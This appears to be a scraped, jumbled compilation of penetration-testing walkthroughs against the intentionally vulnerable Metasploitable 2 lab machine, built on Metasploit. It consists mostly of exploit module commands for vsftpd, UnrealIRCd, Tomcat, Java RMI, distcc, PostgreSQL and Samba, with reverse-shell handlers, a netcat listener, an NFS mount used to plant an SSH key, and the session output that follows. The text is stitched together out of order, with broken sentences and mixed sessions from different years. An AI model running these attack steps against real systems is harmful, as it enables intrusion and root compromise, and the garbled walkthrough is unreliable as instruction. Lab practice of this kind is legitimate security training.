We're going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attacker's machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! The FTP server has since been fixed, but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so let's try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution. Step 9: Display all the columns fields in the .
And this is what we get:
Other names may be trademarks of their respective. whoami
To proceed, click the Next button.
root, msf > use auxiliary/scanner/postgres/postgres_login
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2021-02-06 17:31:48 +0300
Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed.
Metasploitable 3 is the updated version based on Windows Server 2008. Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
[*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script
Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. At a minimum, the following weak system accounts are configured on the system. Below is the homepage served from the web server on Metasploitable and accessed via Firefox on Kali Linux: Features of DVWA v1.0.7 accessible from the menu include: A More Info section is included on each of the vulnerability pages which contains links to additional resources about the vulnerability. Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack. -- ----
[*] Started reverse handler on 192.168.127.159:4444
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. So we got a low-privilege account. This document outlines many of the security flaws in the Metasploitable 2 image. [*] Reading from sockets
For the final challenge you'll be conducting a short and simple vulnerability assessment of the Metasploitable 2 system, by launching your own vulnerability scans using Nessus, and reporting on the vulnerabilities and flaws that are discovered.
SMBDomain WORKGROUP no The Windows domain to use for authentication
LHOST => 192.168.127.159
By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag. What Is Metasploit? DATABASE template1 yes The database to authenticate against
The root directory is shared.
Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM).
[*] Command: echo qcHh6jsH8rZghWdi;
0 Automatic
Module options (exploit/linux/local/udev_netlink):
Setting the Security Level from 0 (completely insecure) through to 5 (secure). Highlighted in red underline is the version of Metasploit.
Step 6: Display Database Name. S /tmp/run
From the shell, run the ifconfig command to identify the IP address. You'll need to take note of the inet address.
The -Pn flag prevents host discovery pings and just assumes the host is up.
[*] Started reverse handler on 192.168.127.159:4444
Our first attempt failed to create a session: The following commands to update Metasploit to v6.0.22-dev were tried to see if they would resolve the issue: Unfortunately the same problem occurred after the version upgrade which may have been down to the database needing to be re-initialized. msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
---- --------------- -------- -----------
---- --------------- -------- -----------
Step 2: Vulnerability Assessment. ---- --------------- -------- -----------
Exploit target:
THREADS 1 yes The number of concurrent threads
[*] Transmitting intermediate stager for over-sized stage(100 bytes)
Between November 2009 and June 12, 2010, this backdoor was housed in the Unreal3.2.8.1.tar.gz archive.
msf auxiliary(tomcat_administration) > show options
This is about as easy as it gets. [*] B: "ZeiYbclsufvu4LGM\r\n"
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. Proxies no Use a proxy chain
set PASSWORD postgres
You will need the rpcbind and nfs-common Ubuntu packages to follow along. The nmap command uses a few flags to conduct the initial scan. [*] Accepted the first client connection
The results from our nmap scan show that the ssh service is running (open) on a lot of machines.
PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
The exploit executes /tmp/run, so throw in any payload that you want.
Id Name
Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit. [*] Accepted the first client connection
msf exploit(java_rmi_server) > set LHOST 192.168.127.159
Nice article. [*] Found shell.
For example, the Mutillidae application may be accessed (in this example) at address http://192.168.56.101/mutillidae/. Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. [*] Writing to socket A
TOMCAT_USER no The username to authenticate as
NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services.
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit. df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev
Description. ---- --------------- -------- -----------
Have you used Metasploitable to practice Penetration Testing? payload => java/meterpreter/reverse_tcp
THREADS 1 yes The number of concurrent threads
Login with the above credentials.
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. Module options (auxiliary/admin/http/tomcat_administration):
Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases. VHOST no HTTP server virtual host
Exploit target:
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. We can now look into the databases and get whatever data we may like. Redirect the results of the uname -r command into file uname.txt.
Payload options (cmd/unix/reverse):
Part 2 - Network Scanning. Cross site scripting on the host/ip field. O/S Command injection on the host/ip field. This page writes to the log.
Getting access to a system with a writeable filesystem like this is trivial. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
[*] Started reverse handler on 192.168.127.159:8888
-- ----
Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather outdated OWASP Top 10.
First let's start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the search command can be used at the MSF Console prompt.
Name Current Setting Required Description
We again have to elevate our privileges from here.
The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. Exploiting All Remote Vulnerability In Metasploitable - 2. msf exploit(java_rmi_server) > set RHOST 192.168.127.154
[*] Reading from socket B
VERBOSE false no Enable verbose output
First of all, open the Metasploit console in Kali. USERNAME => tomcat
It is a pre-built virtual machine, and therefore it is simple to install. 0 Automatic
To access official Ubuntu documentation, please visit: Lets proceed with our exploitation.
Here's what's going on with this vulnerability. -- ----
payload => linux/x86/meterpreter/reverse_tcp
You can edit any TWiki page.
[*] Accepted the first client connection [*] Accepted the second client connection [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700, root@ubuntu:~# telnet 192.168.99.131 1524, msf exploit(distcc_exec) > set RHOST 192.168.99.131, [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700, uid=1(daemon) gid=1(daemon) groups=1(daemon), root@ubuntu:~# smbclient -L //192.168.99.131, Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian], print$ Disk Printer Drivers, IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), msf > use auxiliary/admin/smb/samba_symlink_traversal, msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131, msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp, msf auxiliary(samba_symlink_traversal) > exploit.
On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. Here are the outcomes. msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(postgres_payload) > show options
Name Current Setting Required Description
This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). In Metasploit, an exploit is available for the vsftpd version.
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
These backdoors can be used to gain access to the OS. Mutillidae has numerous different types of web application vulnerabilities to discover and with varying levels of difficulty to learn from and challenge budding Pentesters. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. The next service we should look at is the Network File System (NFS). Perform a ping of IP address 127.0.0.1 three times.
[*] Attempting to autodetect netlink pid
It could be used against both rmiregistry and rmid and many other (custom) RMI endpoints as it brings up a method in the RMI Distributed Garbage Collector that is available through any RMI endpoint.
[*] Started reverse double handler
RHOST => 192.168.127.154
[*] B: "VhuwDGXAoBmUMNcg\r\n"
Metasploitable 2 is a vulnerable system that I chose to use, as using any other system to do this on would be considered hacking and could have bad consequences.
Below is a list of the tools and services that this course will teach you how to use. It is also instrumental in Intrusion Detection System signature development. USER_AS_PASS false no Try the username as the Password for all users
Relist the files & folders in time descending order showing the newly created file.
Name Current Setting Required Description
msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. [*] Writing to socket B
---- --------------- -------- -----------
[*] Reading from socket B
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for.
Metasploitable 2 is a deliberately vulnerable Linux installation. Do you have any feedback on the above examples? msf exploit(tomcat_mgr_deploy) > show options
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
First, what's Metasploit? msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154
msf auxiliary(postgres_login) > run
Payload options (cmd/unix/interact):
Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. The first of which installed on Metasploitable2 is distccd. To download Metasploitable 2, visit the following link. nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks
Metasploitable 2 Full Guided Step by step overview. Essentially this tests whether the root account has a weak SSH key, checking each key in the directory where you have stored the keys. PASSWORD no The Password for the specified username. USERNAME => tomcat
Proxies no Use a proxy chain
eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1, inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0, inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link, UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1, root@ubuntu:~# nmap -p0-65535 192.168.99.131, Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT, Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686, root@ubuntu:~# showmount -e 192.168.99.131. msf exploit(postgres_payload) > set LHOST 192.168.127.159
Loading of any arbitrary web page on the Internet or locally, including the site's password files. Phishing. SQL injection to dump all usernames and passwords via the username field or the password field. XSS via any of the displayed fields. [*] Command: echo ZeiYbclsufvu4LGM;
I've done exploits from Kali Linux on Metasploitable 2, and I want to fix the vulnerabilities I'm exploiting, but all I can find as a solution to these vulnerabilities is using firewalls or filtering ports. In this example, the URL would be http://192.168.56.101/phpinfo.php. Same as credits.php.
0 Automatic Target
In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue.
LHOST => 192.168.127.159
RHOST yes The target address
Exploit target:
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
[*] Successfully sent exploit request
---- --------------- -------- -----------
Exploit target:
It requires VirtualBox and additional software. msf exploit(usermap_script) > show options